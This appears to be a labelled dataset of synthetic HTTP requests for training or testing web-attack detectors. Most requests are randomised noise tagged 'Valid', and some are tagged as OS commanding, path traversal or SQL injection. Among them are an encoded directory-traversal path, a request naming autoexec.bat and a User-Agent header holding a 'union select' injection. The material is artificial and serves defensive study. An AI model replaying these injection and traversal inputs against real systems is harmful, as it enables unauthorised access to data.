Cookie: xs2eadn=sEf.e;le=a0hl0HC6sB;mTaiphteenbt=6615911
Cookie2: $Version="1"
Date: Sun, 09 Apr 06 02:58:06 GMT
ETag: "dhWrfkTj341VgWKeJR"
Expect: eantnc
From: cstRurd@tior.com
If-Modified-Since: Thu, 13 Mar 08 10:21:06 GMT
If-Unmodified-Since: Fri, 28 Jan 05 12:02:47 CET
If-Match: *
If-None-Match: "CfAfJfnnIjcguN_gdu"
If-Range: *
Max-Forwards: 128
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM YXBlZXJuNmVydGVocmVpbTlnbmVrYXI3b2l5ZW50dGl0cG5sb2U1dGdjNA==
Range: 7-8,-418041
Referer: http://mTioltnm.com/alao/bArmnh/eiemi.php3
TE: trailers
Trailer: Pragma
User-Agent: teuc (yf4BPA_K; nwlIvX; d8GEjHzBEH; oA.pR2; iX4JV7)
UA-CPU: PowerPC
UA-Disp: 0718,4997,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 947x489
Via: 8.8 www.hd4uMs7.shtml, 7.0 32.216.147.85, yyft/4.0 119.20.112.123
Transfer-Encoding: s6adrr; r8yo9hsa=oe9sa7mR
Upgrade: ofeeai/0.6, eer/0.4
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 02500062912801761
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13672
Start - Id: 44054
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.ntfn54n.be
Connection: itljho
Accept: */*
Accept-Charset: iso-8859-15, windows-1252, x-mac-arabic, iso-8859-4, shift_jis;q=0.4
Accept-Encoding: gzip, compress;q=0.9, gzip;q=0.2
Accept-Language: drhb3oa-e
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: HNN18pincludeO-Aob=65953;dG1P=nen3tyrn;eiso=36492;nibnh=n/ines2atNsh
Cookie2: $Version="43"
Date: Sun, 21 Aug 05 09:42:26 CET
ETag: "a.HsjY6Z8t76nKz10U"
Expect: 100-continue
From: ctHO@rsrvtl.cz
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "c3YryAjjM.ugyelYJ9"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 8
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: osLn 3ee8aia=uEephmnw
Range: -0
Referer: /etUtrN/itn56d/sGeb8/ft4jt.swf
TE: trailers,chunked
Trailer: Range
User-Agent: cs6ptsbe (xymchsR; c1MzqZWuh; aU7LehpHr; bCb2A4zu8p)
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/7.1 15.255.155.128, 5.6 www.5nubSctu.jpg
Transfer-Encoding: 8ehus
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44054
Start - Id: 28365
class: Valid
GET /nRO1iC2yjxKWIXWWllP3/0azO5ylocationk/m5.Tuv50SFEOJmFEKm/isu/sjsd9tl3te3feeet8kos/eMMhHdl/eqve86iT/69ot7catgd/o3uu9gujyQf.tiff?hnhjbh=69901308&bb=egsteLtirehhldo&ddh=b8os&oRslim=gtellddssv&YlltUgft=deuTjjjB&lwos=2071935925&mthcje9=817&lDuow=8906500&gzoueynco=18843522&lz8re96lEbrhii=isa3&3uAti=td9U&no1Hs=afuT3setoauuoteS7 HTTP/1.1
Host: www.efu6sv4.biz
Connection: Lnnxsu
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eoiedtn-oy0a;q=0.8, 8t-yz8hIser;q=0.3, yfaopna-csud;q=0.5
Cache-Control: jdeO=eegntmje
Client-ip: 50.108.29.222
Cookie: zl43amo3to=41620;86te1ftumi=y5Hv0;lvyd=tfegvieosaivd;tp=huE$trLw8objecttta\xmlyohttps;6uwCes=berfnktsei5fsd68
Cookie2: $Version="196"
Date: Sun, 09 Nov 08 11:55:20 CET
ETag: W/"Rv9qS5.Q4IyyTJEOsj"
Expect: 100-continue
From: stmeR@qTts.com
If-Modified-Since: Mon, 16 Mar 09 16:33:00 GMT
If-Unmodified-Since: Sun, 11 Apr 10 19:40:35 GMT
If-Match: "3zPMLCpnxJNoWocFR"
If-None-Match: "kkLiZ2CsimO_xILW"
If-Range: Wed, 03 Mar 10 24:57:44 GMT
Max-Forwards: 0576
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: asre eeobs=oibp
Range: 665026-
Referer: http://lsvzhya.net/cooi/enst2rix/chiaao/Mce3upd/tocnb.pl
TE: trailers,trailers
Trailer: Trailer
User-Agent: nnaO/7.7.0
UA-CPU: StrongARM
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/9.8 76.241.190.133
Transfer-Encoding: deflate
Upgrade: eaa/1.9
Warning: 347 147.194.234.174 "AYtgenf8eueNtskYttu" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28365
Start - Id: 13484
class: Valid
GET /triKBxYX/hdssud/oDen/netcat_UNBopengJRb/xZr7@htpass/zmle.css?harenowolt=7tw+3e%28&pm9lua=s9um&wmrFts7c=45209879&echoUMFwJiW=Kt&taa=execstdinhautoexecnn&5Jmru=7&hiv4rsJ=tiuee%26n+sdzncii&EhlO.w7DWeL=otymqAicnyrvaa&neT=110027&bmsDuqvd32yuSt=tw+IlBwfd+gxTxs%25e&gsnsty9onulz0t=0342&nGeg4a4Og=n6&anruluneatzxa=bs&jotitnbk=aEh HTTP/1.1
Host: www.hanlseeona.de
Connection: keep-alive
Accept: application/*;q=0.1, application/*;q=0.4, image/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 50.107.120.126
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Sun, 10 Jul 05 17:03:13 UTC
ETag: W/"fmSHMBSKi-_9zce"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Wed, 03 Oct 07 22:45:56 GMT
If-Unmodified-Since: Sun, 03 Dec 06 13:17:09 UTC
If-Match: "O1hmEDOFz3Rl7t5tSqSW"
If-None-Match: *
If-Range: Thu, 22 Nov 07 14:30:14 GMT
Max-Forwards: 7403
MIME-Version: 4.6
Pragma: idNeqame=t0siTsr
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: NTLM aWVlNHNlcnY5dG5lc0x1N3NmdGhjY25qaGNvdXpoamR4dmNkb3M=
Range: 410061-12754,11314-9
Referer: http://www.eertbs.cz/ln0ir5/NrlndR.mpg
TE: gzip,deflate
Trailer: Trailer
User-Agent: oc0povepgencE8q
UA-CPU: x86
UA-Disp: 6344,8500,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 801x0437
Via: FTP/2.3 www.Evih3t5I.css:7541
Transfer-Encoding: deflate
Upgrade: odo/1.8
Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 25.130.189.6
X-Serial-Number: 648318819511788387
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13484
Start - Id: 36051
class: PathTransversal
GET /yP43sAeHi/a3c/ymnxznmxex8Oweye/oV8/-QJ0sock_stream3.m8u/aAlinEPE/vr93y1swK49S8DjA/aIaa/oNbSYEqhgk_-.sh?rcoqn1eesoc=luKJ0%40k7L.j&tjeHr2eh3r=tMTaPJwaz45k&hAmdaiash0o6=7&ctlt=%5Cautoexec.bat&oulAbuan1hcua=lSG0ml0Bh7&premje=3105821&X3ZL=netecihec2Ova&ncn5a=iusunionb HTTP/1.0
Host: 60.245.74.227:4
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.1, x-mac-japanese, x-mac-ce
Accept-Encoding: 
Accept-Language: jAn-hhtsoebu
Cache-Control: max-age=3182
Client-ip: 54.187.94.95
Cookie: iw02cdhrise=t9c;PzkwnedllssOc=82654;odnliw22ol8=8472;Ar=mHVYtq.6
Cookie2: $Version="4"
Date: Mon, 05 Apr 04 01:02:04 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: sntd
From: prei@enuhageatF.uk
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Tue, 22 Dec 09 17:59:56 UTC
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: *
If-Range: *
Max-Forwards: 446
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM dUszdjFsdmluY3ViYnZTcmFFcjBlc25zcnRCM3lnblJldXds
Authorization: Digest nc=05dd6aeD
Range: 0502-,-95,28345-0
Referer: /iA5u/anvwiis/risrTI/bdnvsean.wav
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 1.9; be-aU; rv:0.4.9) Gecko/46980143
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: identity
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 2881124035235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36051
Start - Id: 5176
class: Valid
PUT /nHw4X/sxipvMflhnOK1uT/oaheS/hQU69utmfjaVUkx@.js? HTTP/1.0
Content-Length: 250
Content-Language: I,nregyvtr,egnn9eae
Content-Encoding: identity
Content-Location: /thOeh6u/inisnd.mdb
Content-MD5: b25BbzNwRWdwY3VtZW02dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 02:50:13 GMT
Last-Modified: Wed, 16 Sep 09 05:16:16 UTC
Host: www.eqqebb.cz
Connection: olldsdii
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.5, gzip;q=0.7
Accept-Language: *
Cache-Control: ranr=cn
Client-ip: 99.98.219.242
Cookie: dWtibrpopeht=t?/g;gnonchoi0pbshJ=c6zg;e92veo=133;gOpLe@=chq
Cookie2: $Version="574"
Date: Tue, 16 Feb 10 24:42:13 UTC
ETag: "3LvElF8WO-Ch-AusSu"
Expect: onO4r
From: SetS@t3y4hiLvh.ch
If-Modified-Since: Tue, 25 Dec 07 20:16:00 UTC
If-Unmodified-Since: Fri, 18 May 07 19:13:33 UTC
If-Match: "JmmgLezzmeuodYcq0Cqm"
If-None-Match: "2@FN2Fzw1EVZBhyByX@b"
If-Range: Thu, 29 Dec 05 01:48:47 GMT
Max-Forwards: 2727
MIME-Version: 3.5
Pragma: S='whcie'
Proxy-Authorization: Basic d2VhbnBuVDpiaHNtaG9u
Authorization: Basic aXJlbXRuZDpsdThBcm4=
Range: 28741-
Referer: /lagne/ohntte/e25sa/o6lb7y.bin
TE: trailers,chunked,gzip
Trailer: Authorization
User-Agent: Mozilla/1.8 (compatible; Konqueror/6.3; Open BSD i386; bnnacNew; thnbuehp3)
UA-CPU: MIPS
UA-Disp: 830,260,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 938x1515
Via: 6.8 0.30.206.189, FTP/2.0 172.124.24.29
Transfer-Encoding: identity
Upgrade: midie/5.1
Warning: 512 www.sdnrh.js "2goR" "Mon, 28 Aug 06 22:43:34 UTC"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

having5_RWr=mmrmifD&ldshrSf=sph&nnsodta=jhused&am=45766&huenlo8Asta=rtmnarIdFxlnnesR&rncaoohi0k=771&h5CtS69fs=1352559107&reecwlaraNs4g=4262&ghdoc=ras&irt=o\3i-lsapnaN1&QZdkb8i0.=mV3MrMSf4Q__&iixh=[o 2im&E5WI.uHCjNL=rrnxtel)httpscO&5aOnh=iiDdMwQ

End - Id: 5176
Start - Id: 19812
class: Valid
GET /v75EsEanenb/hP1h/lOJpmetayNVL1gHvbscript/tUIT.xf_Hx7@Jljf/h-ValOuRZE1Galmbdu0B/a5/pElsK/enkbk1lbu/jYAeiS25zJ8ItJ7c.KH/glogxOkw/Yo@systemGLLGmcCGvQ.php3? HTTP/1.1
Host: www.meg21eO.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.7
Accept-Encoding: deflate;q=0.1
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 207.252.253.140
Cookie: UIdivpI6netcatT4D=i4duyWerPubf
Cookie2: $Version="774"
Date: Tue, 25 Sep 07 15:15:09 UTC
ETag: "TS2JMorKZGafPwYxG4ru"
Expect: 100-continue
From: ilotit@a0vnis.fr
If-Modified-Since: Fri, 12 Oct 07 17:55:22 CET
If-Unmodified-Since: Sun, 22 Mar 09 01:59:25 UTC
If-Match: *
If-None-Match: *
If-Range: "vdko4GJWay_gDVJz"
Max-Forwards: 0
MIME-Version: 6.4
Pragma: oceoRfEt=ktp
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: Digest realm
Range: -2442
Referer: http://aerazon.org/dfzrssz/ehen/Adlme5vr/susauer.jpeg
TE: gzip;q=0.3
Trailer: Trailer
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 2.7; nh-uu; rv:2.2.6) Gecko/42216605
UA-CPU: 68000
UA-Disp: 569,1861,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x899
Via: zMie/9.4 61.107.235.242
Transfer-Encoding: gzip
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 41.143.110.239
X-Serial-Number: 09282554265324
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19812
Start - Id: 41239
class: SqlInjection
GET /seraOtugte.mspx?tdenluoty=59268356&at6acp=3&o1aatwjc3tAu=c3esauirhotcs3et&Ao=+wfjponowinntO6hl+l&UnduZ4=nnmtxEaii%3Cs&qacceptwtbzSX=41759755&ioaehtS=mcrhehtcvf&z6k=ktidd3epwEi3&ib1h1tofjTtO=e%7E%5BTdcsautoexec&eadinietieencg=%7CmlE%5DmnAneir%3C&xqebga2to=223327&vaitHo723oflHvo=cihBs0Txoeljtin HTTP/1.1
Host: www.jmhoacAo.uk:885
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1254;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 137.5.183.29
Cookie2: $Version="2"
Date: Wed, 12 Aug 09 15:24:34 UTC
ETag: W/"P9Niq6_s0DQ2KH.n-Hv"
Expect: imhds
If-Unmodified-Since: Tue, 29 Dec 09 16:06:02 CET
If-Match: "43xxKoaSDkxFZ.8p1g"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Tue, 26 Feb 08 01:40:53 CET
Max-Forwards: 09
MIME-Version: 4.6
Authorization: NTLM YXJ3ZWRoMGVDd0FoT251MG5ydGxoYmV0bGoxZUVlUmRuN29laQ==
Referer: /irtO/dnIo/rcljczt.pl
User-Agent: ; exec     get_cust(  'x'' union     select    object_name,object_type,''x'' from     user_objects   where   ''tna''   =    ''    ');
UA-Disp: 9585,9750,32
UA-OS: Linux
Via: osliew/7.6 www.ulnnrpjT.gif:2871, 0.7 www.odmolwT.jpg, HTTP/9.8 19.112.124.173
Transfer-Encoding: eeant
Upgrade: nI4c/2.6
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41239
Start - Id: 18765
class: Valid
GET /K_i/gcs/6J4JNlc54QTqQ0/5abtlvdesnxpo2hceihe/m9tg/rGddzyA6tZjBFvEj/eseXsEnnNr/r55aeczlnshudtmis8/syoUNLoe/aalnhs8i7clqnrw/f1eOrkhyCo/csemoveeExjaeQ.nsf?kSCIkCKAwadminS=w+etXhaee%40sum6&ucthhsn2Ua0enPe=ualetditmutk4wdhr&ui=y&hcuM=418078&oeaFnioeIu7li5s=dxQZn%40ec&NmQa6O7=84&bin=92IbIw HTTP/1.1
Host: www.1t6enoiAbo.org:80
Connection: ssmr
Accept: image/jpeg
Accept-Charset: windows-1258;q=0.9, us-ascii, iso-8859-4;q=0.1, x-mac-arabic;q=0.2, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 250.51.114.142
Cookie: sbp=uxisw2esr;kqfeAosrtjeT=oS1uj5q;ne1o38a1a=sZ0kzC
Cookie2: $Version="015"
Date: Mon, 30 Nov 09 05:30:34 UTC
ETag: "F4pahYczbUumgOsX-cl1"
Expect: 100-continue
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Tue, 01 Mar 05 17:55:13 CET
If-Unmodified-Since: Tue, 27 Jan 04 12:46:05 GMT
If-Match: "v49jyTpZYTV_4EO6mdnF"
If-None-Match: *
If-Range: Thu, 01 Mar 07 14:30:28 CET
Max-Forwards: 5177
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iiniu"
Authorization: NTLM YWRzaWVhZWxmbXRvZWVlandzUWdkalJtdG9pcXRncml2
Range: 1460-
Referer: http://www.oixDtKc3.biz/seeaTavx/hcchoNl.shtml
TE: trailers,gzip;q=0.0
Trailer: Connection
User-Agent: ssopa/5.5.2.4.7
UA-CPU: Sparc
UA-Disp: 752,4892,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 886x1949
Via: FTP/8.6 www.htalsX2m.png
Transfer-Encoding: compress
Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18765
Start - Id: 30078
class: Valid
GET /oazseAgwxU/oIIlr8zUJ_JQ4K/2munpnn3ds/dhz56QRgxw@PbWjc/eysahn.js?WTew2M3f=qZBpSR&qnhi=6&Agc=PhhNreenng-%5Cacaservicesi%3Dso&dr=ltsCd&ualesn=tn40o&@Z9S9YopenIQEGT=o7dGq7jT-Tn&Z86x6inputT=55420&vx2WglugNG=utXrkmt+t+mz&leaoeFooddie6e=26630&owOp7etvtzaa=een1sck8ehrdn HTTP/1.0
Host: 51.89.145.27
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.8, audio/x-wav
Accept-Charset: shift_jis, x-mac-cyrillic;q=0.0, isiri-3342;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: dReimaef-ehaksep9, e4gLwaSs-Es1my0xm
Cache-Control: talli=3i9trlna
Client-ip: 97.106.108.255
Cookie: jdeletenodeWWQKUA8=dUH-KCHcWU;nwB0bin=yz5hG;9e@P1Xconnectdl=axkonp?ccfodhtpassor;n1Ne=aXY5ntFF;t5gd5EElpa=3
Cookie2: $Version="551"
Date: Sun, 22 May 05 20:28:30 CET
ETag: W/"XIPkx5u5UnBswwytzmZ"
Expect: 100-continue
From: nothg@59ro.ch
If-Modified-Since: Fri, 04 Aug 06 05:54:15 CET
If-Unmodified-Since: Sat, 11 Mar 06 02:31:07 GMT
If-Match: "KyE@g5QScSjLZbFpTBU1"
If-None-Match: "0f4YOsYdu-9_iRSoC"
If-Range: "2OnEVx05FQbQusjqMEa"
Max-Forwards: 60
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM OXJlZWludHRoNG5vYXJsZWdvbEViYW9OeWM4Ym5VY25kdmFj
Authorization: Digest response="d7a0Ead56789aaeff9CA6DEaC40BAbc3"
Range: -551
Referer: http://vdoiuloe.gov/i2ho/zdRez7fe/ngumiudg/livRebr.js
TE: chunked
Trailer: Referer
User-Agent: Mozilla/6.5 (X11; U; SunOS sun4u 1.3; cd-op; rv:9.7.0) Gecko/02357212
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: deflate
Upgrade: wteear/7.0, siaf/7.6, vawdDs/3.7, isedd/5.7, tns/6.0
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 442439302674714
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30078
Start - Id: 26712
class: Valid
GET /7oe1eTe/arPdmewm9ot6aipc.pl?omernoisl=2562799833&nR=ilsgdOledioe&72ehueg=eCHbctnenqhtaashutdownt%3Dopts%3A&7Eph5shia=cselectjbs HTTP/1.0
Host: www.nwo3kGk.fr:80
Connection: keep-alive
Accept: application/zip;q=0.5, audio/x-wav, video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.1, cp-932;q=0.6
Accept-Encoding: identity, identity
Accept-Language: etaL-o, ee-elOaiho;q=0.0, oynHatH-lze1r;q=0.5, t8igc-2drct;q=0.1, see-eyone9oi;q=0.9
Cache-Control: max-stale
Client-ip: 41.69.153.49
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="091"
Date: Sun, 28 Aug 05 22:52:00 GMT
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: LhagleWG@oti0.gov
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 03 Sep 08 10:22:39 GMT
If-Match: *
If-None-Match: "ZlQjWdlNpG423oAJHR"
If-Range: Sun, 01 Oct 06 10:14:47 GMT
Max-Forwards: 22
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: Basic SGh0ZmFlcTpkdmVm
Range: 704-,903943-39311
Referer: /etnn/dlti/dnwtsr.sh
TE: deflate;q=0.5,gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.8 (X11; U; Open BSD i586 0.9; ih-dA; rv:2.9.7) Gecko/33109851
UA-CPU: MIPS
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: 6.2 32.199.129.169, psvsa/4.7 164.86.69.191
Transfer-Encoding: ya58s
Upgrade: iagr/3.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26712
Start - Id: 15096
class: Valid
GET /7ipph/mismdotRtisltboar/o5iolg8peaxge/r-J607K7kdZAHXh3Ib5/wtOetZd3h5sthiEoI/.Xi_gCFs/0d/arasDs/gTiee/nesrde3egom7eicifi/kw.yZt5q9prJ3.png?tAoetmty=%7Chm&rccdh60cte=+o%40eTbr4eaqf&8woimefcjD=eZp&cnsofrehssc=otAesnela%3DG-4udeyh&oisst=3si0rtwynhe&9LgY=tBZB1maiS&Onqoai1s=rerot3do2h9Tkf&oiitin7a=jCqoau&gkY2cle=0&anpS=lbHedlmy HTTP/1.1
Host: www.Y1ts6nq.de
Connection: ZoiaE
Accept: application/rtf, audio/*;q=0.0, text/*
Accept-Charset: iso-2022-kr;q=0.8, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=997
Client-ip: 255.45.221.5
Cookie: penNl47e=rXb6;Mfsctuten=yiwp-;ede0uytNy=2624;hlq6dLerr8nac=IeUn;bodyDBRlike=dTNdnmsacfuts3r;ddtetqjooelld=eeixp_
Cookie2: $Version="06"
Date: Fri, 13 Aug 04 11:19:10 UTC
ETag: "0maWvL7l94Pigga1"
Expect: 1MfoqXo
From: rNopit@irtzt.gov
If-Modified-Since: Fri, 17 Oct 08 22:24:43 UTC
If-Unmodified-Since: Sun, 25 May 08 04:35:02 GMT
If-Match: *
If-None-Match: ".MhWDQYq4z-M8lAMu"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.7
Pragma: 25u=ugse
Proxy-Authorization: Basic NGNyZXE6dGUzZWk=
Authorization: Basic eXRzeWNpaTpvdFN3
Range: -3610,072048-063,-8
Referer: /srpEo/ahaso.jpeg
TE: gzip;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (X11; U; Linux i586 3.0; ms-65; rv:6.6.6) Gecko/20779243
UA-CPU: 68000
UA-Disp: 1244,5698,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0882x4753
Via: ed7/8.6 45.156.193.99, 2.3 www.lmTlIvii.css
Transfer-Encoding: compress
Upgrade: algm1/8.1, edtl/2.9, xxsltl/3.5, gslil/9.8, aVl/6.4
Warning: 116 www.eseDe.htm "27q3Eouttsesl7rsU" 
X-Forwarded-For: 85.3.154.75
X-Serial-Number: 911285633908174
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15096
Start - Id: 31325
class: Valid
GET /JWui.exe?eonxdlnyehtdq=bAVdMJe&o0ihi=8215&dsnirom6igftto=495&OQ8aEy_9U=7Bts0&YOzGhtpassRpjwo=t1%28%7Cpt3fbi%7Cwh%3Era&Krjeaddge=sist1s9e%2Fae5h&xyKltDE=owhi5hL&IndSnPKnetcatNRO=n%40RsM8-f&E.4XEO=41905&ewlat6e=294557&ituaoqe=rPlx&eeuun=36826490&scriptvz2@stylev6k=sZ6gpJ1XFjaE&UazDf=arve2tsaahEaroe&bat8clemuou2=197077 HTTP/1.1
Host: www.zS3ot.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, identity
Accept-Language: icnttts-rvvaoah, ern-SmsOda;q=0.0, eiis3r-Rd;q=0.3, leS8-sa5s
Cache-Control: min-fresh=8541
Client-ip: 161.123.214.209
Cookie: zsp8tntiscvoi=nPortgniwtOmtsll9exec;Best=ncvuithmo7;tiit8oErE=le4m
Cookie2: $Version="873"
Date: Tue, 28 Jun 05 16:26:43 CET
ETag: W/"itaj-LM3X92JM4r"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 08 Jan 10 09:29:06 UTC
If-Unmodified-Since: Mon, 14 Jun 04 21:56:59 UTC
If-Match: *
If-None-Match: "v._iKkL-KBVPaD8aaDU9"
If-Range: "lgEUE8q8mjsFxefIbuj"
Max-Forwards: 16
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: -388719
Referer: http://www.37tOu.net/ibenle/wGpjmes.cfm
TE: gzip;q=0.1,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 8.2; 4e-ei; rv:8.6.9) Gecko/23137239
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5304x185
Via: 3.3 130.242.71.109:3, FTP/9.9 www.w1exahr.shtml, lxpis/0.7 110.30.225.53
Transfer-Encoding: compress
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 90.60.198.91
X-Serial-Number: 76735229395499245344
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31325
Start - Id: 27850
class: Valid
GET /aicnceiE6sc/uaJG.aDn@nG/svalhi8spn1s9aeq/Fb/gJ2alY.gif?tligyeee0l=eae&bhmsIaejse6oKre=4295&3torro=91&W8RC@@Cp-=-h%28er%29unionertkdprocessing-instruction%5D&.GOAnF-wZg=34&heSsneqnselnDl3=36oeiaoiiseEte&votosxhe=838930&rraxNau=pfeeHeha3soAskn&rS6ed11ai9=oslr%5CcSferign&eteme6=jnetcat%5C+fesinsostyleoeE-uspm4 HTTP/1.0
Host: 176.249.225.181
Connection: keep-alive
Accept: text/*, audio/basic;q=0.6, text/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ee6LtWa-ercna, sznpe-nniM;q=0.7, odc3a-heraeh, tcnnpmi-uoeEp, lgtMc-hQgu
Cache-Control: no-transform
Client-ip: 62.13.156.171
Cookie: ze41l=ohTceEefeocul;antddhweeresd=innChlseeaeeshmenn
Cookie2: $Version="1"
